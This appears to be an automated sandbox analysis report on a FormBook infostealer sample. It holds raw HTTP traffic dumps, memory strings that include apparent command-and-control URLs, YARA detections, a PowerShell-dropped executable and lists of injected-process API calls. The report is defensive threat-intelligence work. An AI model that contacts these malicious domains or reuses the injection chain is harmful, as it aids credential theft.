a7 12 de 8d bc 97 de d3 5d 03 87 06 bd 88 f8 7d e4 45 a0 aa 61 f3 d4 36 c1 3d 77 77 53 0e f0 22 78 7f e1 af 8a f4 95 a0 bc b8 f7 2e 53 37 19 8d 0a 84 19 f8 33 1c f2 50 c6 15 ac 5f b1 60 df d1 e6 20 83 4f 77 5d 0c fb b2 a8 9a 57 64 7d ec 37 d1 93 0f bb d8 83 f7 cf 9d 0f a3 38 8f 9b 18 a4 f7 b5 07 52 f8 84 7f fc 2a aa 89 9b 14 7e a2 30 6a a4 17 cd 68 52 b4 b9 ff 88 be 0c be 10 d4 cd 29 85 a3 8b dd 3e 9b cb ab eb cf cc 97 e6 16 fe 69 f4 5f 5f bb 97 16 14 79 73 1f 80 2c 4e 4f 0f 23 a1 8a 41 fa 61 a4 c0 b4 83 4d ec 81 0f a3 1a e4 f5 7d 0d ab 38 f8 fd 3d 5b 1d 9f e1 c3 08 a7 ca e1 fb c9 34 ce e1 Data Ascii: f12fbZYJr~B9g]jH=$X./QU/URw?8JdfDdd,_Po2^JkGQ~{|Fc06"o`7]}Ea6=wwS"x.S73P_` Ow]Wd}78R*~0jhR)>i__ys,NO#AaM}8=[4
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Feb 2025 11:37:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aWBWsn0Q6zMydut34po5PrvAKK%2Bnp1znmoVmIF7IBmqwjKSnGPvr5UeqqTdf6ImbEavn8nFx28%2BSMZtee5cNrSWQeonXdDpl%2B6OqohYbaFpJJSSWEvBOENuU7xhJ6tRruFcT%2F2bc38Dni8k%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 911cc4f2dffc0f99-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1482&min_rtt=1482&rtt_var=741&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=543&delivery_rate=0&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 61 31 65 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c Data Ascii: 2a1e<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <titl
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Feb 2025 11:38:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uGanyTt1TsrOogO42lKwedoGqEYu6vKmlULfrhFTZDIb%2Bv60g4F7AgGc2tl1a5kfX9TPGE%2BZagTLqPvfugC%2FlzvXvItioonZ4ThyD5wznCyIXUm7VSTIBDDXsL%2BWkH5lFW%2Fk6vAfTSg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 911cc5172f598c0b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1998&min_rtt=1998&rtt_var=999&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=806&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzJaC0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Feb 2025 11:38:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1hL%2BpES0eMF8zXgAVom81N%2FNymkDQnRBjst2HfN66xlhL%2BJA0tXd1fgDcXSPsef4n%2BzQIt%2BU%2B%2Fen%2FGZg6djpCDTxGlZCEfNquXPM8r2qzeb8DSFdnxg0S1NgVcnWOkTY0AEPi5WmIjo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 911cc526f8a53314-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1972&min_rtt=1972&rtt_var=986&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=830&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzJaC0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Feb 2025 11:38:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XkWqvjwFKdNhtcBS%2FRHsXvcDR4Mpn8nDTslcF4moJhKyNTJ6U7GMlmWTw840kpGkIpk0k9Lk9MFXKHtst0Ea666riE4QIwyP5Hhse3gHGmXU%2Fi11STU0hISa2bXSt9S0ZWZXWx1EtPs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 911cc5375a4a4316-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1582&rtt_var=791&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1843&delivery_rate=0&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzJaC
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Feb 2025 11:38:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hTL4T9jSjk5beu4UV49ai%2BCwdLKQlwvuoDLRTV9SEtAFEvijBy%2FK%2Fr2b%2Bkp%2F%2BhHnjlBskDonDRny7QSaBcD08KLLZ0DtUr19ZqkL0E8YKJiB%2BujgUovzUs0hOTjSu%2BfpW2muj3HHTRE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 911cc5481c390c88-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1621&rtt_var=810&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=540&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Fri, 14 Feb 2025 11:38:19 GMTEtag: "6746afef-94"Server: nginxX-Cache: BYPASSConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Fri, 14 Feb 2025 11:38:22 GMTEtag: "6746afef-94"Server: nginxX-Cache: BYPASSConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Fri, 14 Feb 2025 11:38:25 GMTEtag: "6746afef-94"Server: nginxX-Cache: BYPASSConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: runonce.exe, 0000000A.00000002.2615702549.0000000005F88000.00000004.10000000.00040000.00000000.sdmp, y85te3vqfc6QGAKyw78l.exe, 0000000D.00000002.2613908112.0000000003968000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: powershell.exe, 00000000.00000002.1362764872.000000000633A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000000.00000002.1348711002.0000000005426000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000000.00000002.1348711002.00000000052D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000000.00000002.1348711002.0000000005426000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: y85te3vqfc6QGAKyw78l.exe, 0000000D.00000002.2612552379.0000000001415000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kjuw.party
                Source: y85te3vqfc6QGAKyw78l.exe, 0000000D.00000002.2612552379.0000000001415000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kjuw.party/e0jv/
                Source: runonce.exe, 0000000A.00000002.2617122118.00000000082C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: powershell.exe, 00000000.00000002.1348711002.00000000052D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: runonce.exe, 0000000A.00000002.2617122118.00000000082C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: runonce.exe, 0000000A.00000002.2617122118.00000000082C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: runonce.exe, 0000000A.00000002.2617122118.00000000082C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: powershell.exe, 00000000.00000002.1362764872.000000000633A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000000.00000002.1362764872.000000000633A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000000.00000002.1362764872.000000000633A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: runonce.exe, 0000000A.00000002.2617122118.00000000082C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: runonce.exe, 0000000A.00000002.2617122118.00000000082C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: runonce.exe, 0000000A.00000002.2617122118.00000000082C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: powershell.exe, 00000000.00000002.1348711002.0000000005426000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: runonce.exe, 0000000A.00000002.2608327762.000000000368C000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.2608327762.0000000003669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: runonce.exe, 0000000A.00000002.2608327762.000000000368C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: runonce.exe, 0000000A.00000003.2018673679.00000000081F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: runonce.exe, 0000000A.00000002.2608327762.0000000003669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: runonce.exe, 0000000A.00000002.2608327762.0000000003669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: runonce.exe, 0000000A.00000002.2608327762.0000000003669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: runonce.exe, 0000000A.00000002.2608327762.0000000003669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: powershell.exe, 00000000.00000002.1362764872.000000000633A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: runonce.exe, 0000000A.00000002.2617122118.00000000082C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: y85te3vqfc6QGAKyw78l.exe, 0000000D.00000002.2613908112.00000000037D6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.seasay.xyz/c9ts/?ddE=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJn
                Source: runonce.exe, 0000000A.00000002.2615702549.0000000005C64000.00000004.10000000.00040000.00000000.sdmp, y85te3vqfc6QGAKyw78l.exe, 0000000D.00000002.2613908112.0000000003644000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.2126788211.000000002B9E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&amp;topId=86884/vhr7/
                Source: runonce.exe, 0000000A.00000002.2615702549.0000000005C64000.00000004.10000000.00040000.00000000.sdmp, y85te3vqfc6QGAKyw78l.exe, 0000000D.00000002.2613908112.0000000003644000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.2126788211.000000002B9E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=86884/vhr7/

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.2613383446.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1835704349.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2613236980.0000000004EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.2612552379.00000000013C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1836454389.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2602590342.0000000003250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1838271008.0000000003020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2613263682.0000000002620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: Process Memory Space: powershell.exe PID: 7352, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                PE file contains section with special chars
                Source: x.exe.0.drStatic PE information: section name: |]e@TkD
                PE file has nameless sections
                Source: x.exe.0.drStatic PE information: section name:
                Powershell drops PE file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042CAA3 NtClose,5_2_0042CAA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42B60 NtClose,LdrInitializeThunk,5_2_02D42B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_02D42C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_02D42DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D435C0 NtCreateMutant,LdrInitializeThunk,5_2_02D435C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D44340 NtSetContextThread,5_2_02D44340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D44650 NtSuspendThread,5_2_02D44650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42AD0 NtReadFile,5_2_02D42AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42AF0 NtWriteFile,5_2_02D42AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42AB0 NtWaitForSingleObject,5_2_02D42AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42BF0 NtAllocateVirtualMemory,5_2_02D42BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42BE0 NtQueryValueKey,5_2_02D42BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42B80 NtQueryInformationFile,5_2_02D42B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42BA0 NtEnumerateValueKey,5_2_02D42BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42EE0 NtQueueApcThread,5_2_02D42EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42E80 NtReadVirtualMemory,5_2_02D42E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42EA0 NtAdjustPrivilegesToken,5_2_02D42EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42E30 NtWriteVirtualMemory,5_2_02D42E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42FE0 NtCreateFile,5_2_02D42FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42F90 NtProtectVirtualMemory,5_2_02D42F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42FB0 NtResumeThread,5_2_02D42FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42FA0 NtQuerySection,5_2_02D42FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42F60 NtCreateProcessEx,5_2_02D42F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42F30 NtCreateSection,5_2_02D42F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42CC0 NtQueryVirtualMemory,5_2_02D42CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42CF0 NtOpenProcess,5_2_02D42CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42CA0 NtQueryInformationToken,5_2_02D42CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42C60 NtCreateKey,5_2_02D42C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42C00 NtQueryInformationProcess,5_2_02D42C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42DD0 NtDelayExecution,5_2_02D42DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42DB0 NtEnumerateKey,5_2_02D42DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42D10 NtMapViewOfSection,5_2_02D42D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42D00 NtSetInformationFile,5_2_02D42D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D42D30 NtUnmapViewOfSection,5_2_02D42D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D43090 NtSetValueKey,5_2_02D43090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D43010 NtOpenDirectoryObject,5_2_02D43010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D439B0 NtGetContextThread,5_2_02D439B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D43D70 NtOpenThread,5_2_02D43D70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02D43D10 NtOpenProcessToken,5_2_02D43D10
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C4650 NtSuspendThread,LdrInitializeThunk,10_2_052C4650
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C4340 NtSetContextThread,LdrInitializeThunk,10_2_052C4340
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2D30 NtUnmapViewOfSection,LdrInitializeThunk,10_2_052C2D30
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2D10 NtMapViewOfSection,LdrInitializeThunk,10_2_052C2D10
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_052C2DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_052C2DF0
